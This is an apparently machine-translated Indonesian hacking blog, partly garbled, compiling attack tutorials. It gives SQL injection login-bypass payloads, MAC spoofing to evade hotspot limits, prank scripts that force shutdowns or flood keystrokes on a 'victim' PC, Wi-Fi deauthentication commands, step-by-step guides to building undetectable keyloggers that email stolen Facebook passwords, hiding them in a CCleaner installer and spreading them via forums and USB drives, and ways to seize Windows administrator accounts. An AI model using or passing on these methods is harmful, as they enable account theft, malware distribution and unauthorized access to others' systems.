Anda juga dapat melakukan ini dengan field tersembunyi, untuk itu anda harus menyimpan halaman web dan harus perubahan yang dibuat ke lapangan URL dan parameter dan memodifikasi sesuai. Sebagai contoh:


<F O R M = http://example.com/login action. asp method = p o s> t
<Type input name = tersembunyi = nilai abc = "hi 'atau 1 = 1 -">
</ F O R M>




Jika keberuntungan Anda mendukung Anda, Anda akan mendapatkan login ke website tanpa username atau password.


Tapi mengapa 'atau 1 = 1 -?
Ambil halaman asp yang akan menghubungkan Anda ke halaman lain dengan URL berikut:

http://example.com/search.asp?category=sports

Dalam 'kategori' URL ini adalah nama variabel dan 'olahraga' adalah nilai itu.

Berikut permintaan ini kebakaran berikut query pada database di latar belakang.

SELECT * FROM TABEL-NAMA WHERE kategori = 'sports'

Dimana 'TABEL-NAMA' adalah nama tabel yang sudah ada dalam database tertentu.
Jadi, query ini mengembalikan semua masukan yang mungkin dari 'pencarian' tabel yang datang di bawah 'olahraga' kategori.

Sekarang, asumsikan bahwa kita mengubah URL ke dalam sesuatu seperti ini:

http://example.com/search.asp?category=sports 'atau 1 = 1 -


Sekarang, 'kategori' variabel kita sama dengan "olahraga 'atau 1 = 1 -", yang kebakaran query SQL pada database sesuatu seperti:
SELECT * FROM pencarian WHERE kategori = 'olahraga' atau 1 = 1 - '

query sekarang harus memilih semuanya dari tabel 'pencarian' terlepas dari apakah kategori adalah sama dengan 'olahraga' atau tidak.
Sebuah double dash "-" katakan MS SQL server untuk mengabaikan seluruh permintaan, yang akan menyingkirkan kutip tunggal terakhir menggantung (').
Kadang-kadang, dimungkinkan untuk mengganti dash double dengan single hash "#".

Namun, jika tidak server SQL, atau Anda tidak bisa mengabaikan sisa query, Anda juga dapat mencoba

'Atau' a '=' a

Ini harus mengembalikan hasil yang sama.
Tergantung pada query SQL yang sebenarnya, Anda mungkin harus mencoba beberapa kemungkinan:

'Atau 1 = 1 -
"Atau 1 = 1 -
atau 1 = 1 -
'Atau' a '=' a
"Atau" a "=" a
') Atau (' a '=' a
'Atau''='

Enjoy ..



Bluetooth Hacking Full Disclosure
Bluetooth Hacking Full Disclosure

Bluetooth Hacking Full Disclosure @ 21C3. Blue snarfing Data Theft Calendar Appointments

Images Phone Book Names, Addresses, Numbers PINs and other codes Images Bluetooth Hacking

Full Disclosure ...

Here:
Download




Cara Membobol Password Hotspot Dengan K-MAC



K-MAC

Tuesday, April 5, 2011


Cara Membobol Password Hotspot Dengan K-MAC

Cara Membobol Password HotSpot Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.

Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas. Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.

Apa itu MAC Adress ? In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs). Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita. Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi. Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok.

Jenis proteksi yang digunakan adalah MAC Address Filtering. Bagaimana menjebol Proteksi dengan MAC Address ? Ada sebuah tools yang sangat bermanfaat untuk anda.

Tools itu bernama K-MAC anda dapat mendownloadnya dibawah ini...

Selanjutnya akan di jelaskan mengenai cara mengganti MAC address menggunakan k-mac Pertama jalankan program k-mac jika belum punya silahkan di download. Selanjutnya Ubah MAC menjadi apa dan berapa??? (Kode yang digunakan “1-0″ & “A-F”) hexadesimal 1.

Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali Lalu bagaimana bila akses Wireless dibuat dengan proteksi yang lain ? Seperti WEP Keys dan WPA/WPA2 Keys ? Itu akan saya bahas lain kali Happy Free Surfing !

Download Here:
(Click Skip Ad)

Enjoy ..



Script Jahil Yang Buat Geram Dan Menjengkelkan



Kali ini kita buat beberapa script yang berfungsi pada OS windows, scriptnya akan berfungsi sesuai dengan fungsinya

Tidak perlu susah … karna script hanya di muat di notepad, type save nya cukup dengan format .VBS atau .bat

Langsung aja deh …

1). Memberi pesan dan shutdown komputer :

@echo off
msg * Aku tidak suka kamu
shutdown -c “Error! Kamu jelek sekali” -s

Note : save dengan .bat

2). Menyalakan tombol Caps lock secara simultan :

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Note : save dengan extension .vbs

3). Buka/tutup CD drive secara terus menerus (Update) :

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Note : save dengan Extexsion .vbs

4). Tekan Enter secara simultan :

et wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Note : save dengan ex.vbs

5). Mengetik pesan kita secara otomatis di notepad :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Note : save dengan Ex.vbs

6). Menjalankan BACKSPACE secara simultan :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Note : save dengan ex.vbs

7). Buka Notepad secara terus menerus :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Note : save dengan type .bat

8). Munculin 5 pilihan yang harus korban pilih :

@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri…
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye…
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Note : save dengan .bat

9). Hack keyboard sehingga korban dipaksa mengetik ” You are a gay” secara simultan :

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a gay”
loop

Note : save dengan ex.vbs

Saya tdk bertanggung jawab atas penyalah gunaan script2 di atas.. ini cuma mau share saja...

ingat ini untuk pendidikan saja jangan disalah gunakan ..

Enjoy..



Hacking Wifi - Melumpuhkan Client Terhubung AP


Langkah -langkah Melumpuhkan Client yang terhubung pada suatu AP dengan BackTrack 4 :

1). Jalankan Live CD LinuxBackTrack 4 R2.

2). Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.

3). Tutup Kismet, lalu buka console, ketikkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0
#airmon-ng stop ath1 -> untuk mematikan driver ath1
#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4). Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

5). Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6). Langkah terakhir, kita lakukan serangan, ketikkan:

#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:


Aireplay-ng -> program yang digunakan untuk melakukan de authentication

--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang

enjoy ..



Java Based Remote Keylogger (  Cara Hack Fb Terbaik )

Halo way, hari ini saya akan memperkenalkan Anda yang lain berbasis java keylogger terpencil. Ini adalah yang terbaik yang sempurna dalam hack Facebook . Sejak hari ini teknologi telah maju ke generasi berikutnya, sekarang yang menjadi cukup mudah untuk hack account email, agar jarak jauh. Sebagian besar dari kita saat ini tertarik dengan cara ini yang bekerja secara remote yaitu Anda tidak memiliki akses fisik ke sistem. keylogger hack Remote adalah alat yang mencatat kunci stroke setiap pengguna anonim dan mengirim catatan login baik ke klien email SMTP atau klien FTP.

Catatan: Ini adalah untuk tujuan pendidikan saja.



Fitur Java Remote keylogger Berdasarkan: Facebook Tool Hacker Terbaik (IStealKeys 2.0)

* 100% FUD dari semua virus-anti
* Kirim Log Untuk Email account (gmail, yahoo, aol, hotmail) dan Ftp
* Ukuran Penurunan Server
* Memori Dioptimalkan UsageIcon Changer
* Waktu Setter
* Melt server setelah menggunakan
* Start up adder
* Menjadi aktif setelah setiap start up windows
* Dan banyak fitur lainnya

DOWNLOAD Keylogger:
MediaFire

Bagaimana menggunakan keylogger?

1. Download keylogger dan Extract file.
2. Sekarang Masukkan Rincian akun gmail palsu yang Anda harus buat untuk menggunakannya. (Untuk alasan keamanan)
3. Sekarang Mengatur penghitung waktu untuk menerima log ke alamat email Anda.
4. Sekarang klik pada mengirim verifikasi untuk memeriksa apakah keylogger bekerja dengan benar atau tidak.
5. Sekarang Buka mutex kolom teks. Ada jenis apa pun limbah (catatan mencoba untuk memasukkan sebanyak mungkin karakter khusus dan atleast 70 hingga 80 karakter). Jangan klik pada Hasilkan.
6. Sekarang klik pada Server Kompilasi Menciptakan keylogger. Ini akan meminta Anda untuk menyimpan file. desktop Pilih untuk menyimpan file dan nama apapun yang anda inginkan.

Sekarang Anda memiliki server keylogger's. Sekarang untuk mengikat dan membuatnya tidak terdeteksi dan penyebaran secara online kemudian kunjungan ke posting ini:
KLIK DI SINI

Enjoy ..



Cara Hack Account Fb Dari Jarak Jauh

Halo teman-teman saya hari ini akan menjelaskan kepada anda cara hack password Facebook atau akun dari jarak jauh dengan menggunakan keylogger. Sistem kerjanya 100% hack dan Anda dapat dengan mudah hack akun Facebook atau password menggunakan hack ini. Dalam tutorial ini saya akan menjelaskan kepada Anda bagaimana untuk hack Facebook dan password lain dari pengguna manapun menggunakan 100% keylogger FUD. Keylogger dalam tutorial ini kita akan bahas adalah L33ts keylogger dan 100% FUD (sepenuhnya tidak terdeteksi).


Hacking account Facebook sangat mudah dan hanya memerlukan tidak lebih dari 10 menit kerja. Jangan khawatir saya juga akan memberitahu Anda bagaimana untuk melindungi account facebook anda atau password dari hacks tersebut dan hacker. Tapi untuk ini anda harus tahu bagaimana hacker hack account facebook anda. Jadi pertama saya mengajarkan anda cara hack account facebook jarak jauh dan kemudian saya akan memberitahu bagaimana melindungi diri dari ini.

CATATAN: Tutorial ini hanya untuk tujuan Pendidikan yaitu untuk membuat Anda sadar hacker dapat hack account . Tolong jangan menyalahgunakan trick ini. T.B tidak bertanggung jawab atas segala kerusakan yang disebabkan oleh Anda.

Jadi Ways mari kita mulai hacking akun Facebook atau password ....

Langkah-langkah untuk hack account menggunakan keylogger:


1. Membuat Server keylogger untuk hack password.
2. Ekstrak Icon dari installer.
3. Bind server keylogger dengan setup perangkat lunak.
4. Bagaimana untuk menyebarkan keylogger Anda atau mengirimkannya ke teman Anda untuk hack Facebook atau password.

Step 1. Membuat Keylogger Server


1.Download Keylogger

   Download
 

2. Ekstrak file, Sekarang Anda akan mendapatkan dua folder:
a. Pertama satu berisi Keylogger dan Binder
b. Kedua Berisi tool Resource Hacker. (untuk mengekstrak ikon dari installer).
(Matikan AntiVirus Anda Sebelum Mengextrack File)

3. Sekarang buka keylogger. Ini berisi dua file satu untuk email gmail dan lainnya untuk password. Untuk membuat satu account di Gmail uji dan masukkan rincian itu dalam hal ini.



(Click Gambar Untuk Memperbesar)

4. Setelah memasukkan email dan password. Setel interval waktu biasanya ditetapkan 3 menit yaitu setelah berapa banyak waktu yang Anda inginkan untuk menerima log dari pengguna.
5. Sekarang klik pada mengirim email verifikasi. Mail ini adalah untuk menguji bahwa keylogger Anda bekerja dengan benar atau tidak.
6. Setelah Anda mengklik ini Anda akan menerima email konfirmasi di test account yang akan mengkonfirmasi keylogger yang bekerja.
7. Sekarang klik generate untuk mengatur mutex tersebut (setiap kunci rahasia untuk membuat keylogger Anda FUD) dan kemudian klik pada compile server.
8. Sekarang simpan file ke desktop atau di lokasi lain pilihan Anda. Sekarang server Anda sudah siap namun dapat dengan mudah dideteksi.

Langkah 2: Ekstrak file Icon dari installer (hacker sumber daya)



1. Buka folder resource hacker dan buka file reshacker.
2. Sekarang, masuklah ke menu dan buka file setup. Misalkan kita ingin melampirkan keylogger kami untuk file setup CCleaner. Jadi buka setup CCleaner dengan reshacker
3. Sekarang di menu ada satu tindakan tombol klik dan kemudian klik simpan semua reshacker


(Click Gambar Untuk Memperbesar)

4. Sekarang simpan semua reshacker untuk desktop atau di lokasi lain pilihan Anda.
5. Ini terdiri dari dua file satu adalah ikon file dan lainnya adalah file res. Kita hanya perlu file icon, sehingga Anda dapat menghapus file file lain yaitu res.
6. Sekarang kita memiliki Icon of file installer (seperti dibahas di atas setup CCleaner Icon).


Langkah 3: Bind server keylogger dengan software apapun

1. Sekarang Pergi ke folder keylogger dan buka Binder.
2. Sekarang Klik pada tombol + diberikan di bawah ini untuk menambahkan file.
3. Sekarang tambahkan server keylogger dan mengatur perangkat lunak (misalnya dalam kasus kami itu setup CCleaner).
4. Sekarang di menu Binder, Ke Pengaturan. Ada pilih ikon yang kita telah dihasilkan pada langkah sebelumnya dan menetapkan lokasi file output seperti yang ditunjukkan pada gambar.



5. Sekarang pergi lagi ke menu File di Binder dan klik pada file Bind.
6. Sekarang keylogger binded Anda sudah siap. Sekarang Anda harus menyebarkan atau kirimkan ke korban yaitu teman Anda.


Langkah 4: Cara Penyebaran Keylogger atau mengirimkannya ke korban atau teman

1. Sekarang Anda memiliki satu software file setup dengan keylogger terpasang dengan itu (Dalam kasus kami. kita harus setup CCleaner dengan keylogger terpasang dengan itu.
2. Sekarang Spread keylogger Anda melalui forum. Anda mungkin menjadi anggota dari berbagai forum menggunakannya untuk menyebarkan keylogger Anda dalam bentuk posting perangkat lunak. Dapat menggunakan berbagai perangkat lunak untuk menyebarkan mereka bahwa pengguna sering download.
3. Menyebar melalui Pendrives atau drive USB hard. Misalkan seorang teman meminta Anda untuk perangkat lunak memberikan perangkat lunak yang telah terpasang keylogger

Catatan: Anda juga dapat memasang keylogger dengan gambar juga. Tapi itu bisa dideteksi oleh antivirus. Jadi menghindari jenis seperti hacking.
Jadi tidaklah begitu mudah untuk hack account Facebook siapa pun hanya dalam beberapa menit.

Bagaimana melindungi diri dari hacks?
Pencegahan selalu lebih baik daripada mengobati jadi selalu ikuti langkah-langkah:
1. Jangan gunakan perangkat lunak retak dan tidak men-download dari situs web yang tidak sah.
2. Selalu menjaga antivirus dan anti-spyware up to date.
3. Selalu scan file sebelum memindahkan mereka ke USB.
4. Jangan mengizinkan pengguna lain untuk menggunakan PC password yaitu Anda melindunginya.



enjoy ..




Cara hack account admin atau administrator

Halo teman-teman, selamat datang kembali hari ini saya akan berbagi dengan anda semua cara untuk hack account admin atau administrator di windows XP. Hari ini saya akan menjelaskan cara hack account admin atau administrator hanya dalam 2 menit. Jadi orang bersiap-siap untuk hack teman Anda sistem dalam 2 menit.
Sebagian besar waktu khusus di perguruan tinggi kita tidak memiliki akses ke account admin, sekarang misalkan anda ingin menginstal perangkat lunak pada sistem tersebut. Apa yang Anda akan lakukan sekarang? Minta admin untuk memasukkan password untuk Anda atau hanya hack itu sendiri. T.B akan memberitahu Anda sejujurnya bahwa saya tidak pernah memilih salah satu metode dalam hidupku. Kapanpun i need hak administrator saya telah hacked itu tetapi untuk para pria tidak melakukan seperti itu cara karena saya diskors dari laboratorium dua kali untuk melakukan itu.

Ada empat cara untuk hack password admin:
1. Cukup Unprotected mengakses Account Administrator.
2. Hacking Melalui Perintah Pengguna Bersih.
3. Hacking Menggunakan ERD (Emergency Rescue Disk) Komandan.
4. Reset password admin menggunakan Ubuntu Live CD atau DV

1. Cukup Mengakses Admin Unprotected atau account Administrator.


Bagaimana hack ini bekerja? Ketika kita menginstal windows XP di sistem kami biasanya rename nama pengguna sebagai nama kami atau beberapa kata kunci lainnya. Tapi Windows selalu menciptakan account administrator setiap kali kami mendirikan windows XP. Jadi, ketika Anda membuat account pengguna Anda saat instalasi, windows menciptakan dua akun yang satu adalah nama pengguna account Anda dan lainnya adalah Administrator account. Namun hal utama adalah bahwa Anda hanya akan melihat account dengan username dan Administrator account tersembunyi namun di sana dan Anda dapat dengan mudah mengakses bahwa dengan menggunakan langkah-langkah berikut:
Langkah 1: Mulai komputer Anda.
Step2: Sekarang biarkan mulai sampai username pengguna jendela itu tampak seperti yang ditunjukkan pada snapshot di bawah ini ...

Step3: Seperti ini Muncul Window Tekan Ctrl + Alt + Delete (2 kali) .. Sekarang Windows seperti ditunjukkan di bawah ini muncul ..

Langkah 4: Sekarang seperti yang ditunjukkan di atas Ketikkan Administrator pada kotak Username dan tekan enter ... Sekarang Anda akan menjadi login di account admin dengan mudah dapat beristirahat password ...

Untuk reset password Anda dapat mengikuti dua Prosedur ..
Prosedur 1: Goto Start - Control Panel> - Account User> .. Sekarang pilih account yang ingin u password reset.
Prosedur 2: Ikuti yakni metode Next hacking password melalui Command Pengguna Bersih.

Catatan: Hack 1 hanya akan bekerja jika Administrator (default) adalah yaitu Pengguna tidak dijamin karena beberapa nama pengguna yang lain seperti di atas ditunjukkan gambar ...

2. Hacking account admin atau administrator menggunakan perintah net user

Catatan: Ini akan bekerja hanya bila pengguna memiliki akses account pengguna atau bagaimana ia telah diizinkan atau bekerja di account admin.

Langkah-langkah untuk hack account admin:
Langkah 1: Goto Start dan klik Run dan Jenis cmd dan tekan enter ...
Langkah 2: Sekarang ketik "net user" pada command prompt untuk mendapatkan Semua account pada komputer itu .. seperti yang ditunjukkan pada gambar ..


Langkah 3: Sekarang Pilih account yang u ingin Reset Password ...
Misalkan kita ingin Reset Password Administrator ...
Sekarang Ketik "pengguna * Administrator bersih" Tanpa tanda kutip ... dan tekan Enter. Seperti ditunjukkan dalam Gambar bawah ..


Langkah 4: Sekarang setelah itu tekan Enter dua kali untuk beristirahat password. Sekarang kali terbuka yang Rekening u .. Ini tidak akan memerlukan Password ..

3. Hacking account admin menggunakan komandan ERD (100% bekerja hack)

Hack ini tidak memiliki batasan, menggunakan hack Anda dapat kembali masing-masing dan setiap komputer.

Pertama-tama Download ERD (Emergency Rescue Disk) komandan ... Ekstrak File dan bakar ke CD ...
Download

LANGKAH - LANGKAHNYA:
1. Masukkan ERD Commander Boot CD ke dalam drive dan restart sistem
2. Boot komputer menggunakan ERD Commander Boot CD. Anda mungkin harus menentukan urutan boot pada BIOS pertama.
3. Pilih instalasi Windows XP dari daftar seperti yang ditunjukkan.


4. Dari menu Komandan ERD (menu Start), klik System Tools dan klik Tukang Kunci


5. Click Next


6. Pilih account administrator dari daftar yang ingin Anda reset passwordnya


7. Ketik password baru ke dalam kotak, klik Next dan klik Finish


8. Restart Sistem dan mengambil CD dari Drive .. Dan Nikmati Admin account ...

Metode 4: Reset password windows menggunakan Ubuntu Live CD atau DVD

Untuk hack ini Anda akan memerlukan Ubuntu Live CD.

Langkah-langkah yang terlibat:

1. Masukkan Live CD Ubuntu dan boot dari itu.
2. Buka terminal dan menginstal chntpw di Ubuntu. Untuk melakukannya menggunakan perintah berikut.

sudo apt-get update
sudo apt-get install chntpw


3.Sekarang Anda mount volume Windows. Dalam kasus saya itu dev/sda1.

sudo mkdir /media/WINDOWS
sudo mount /dev/sda1 /media/WINDOWS


4.Sekarang arahkan ke folder konfigurasi Windows.

cd /media/WINDOWS/WINDOWS/system32/config/

5.Untuk mereset password administrator masukkan

sudo chntpw SAM

6.Setelah menyelesaikan perintah ini Anda akan melihat 5 pilihan yang berbeda . Pilih satu dan tekan 1 enter dan berhasi;.

7.Sekarang restart sistem anda, tidak akan meminta password.

Enjoy ..











Tidak ada komentar:

Posting Komentar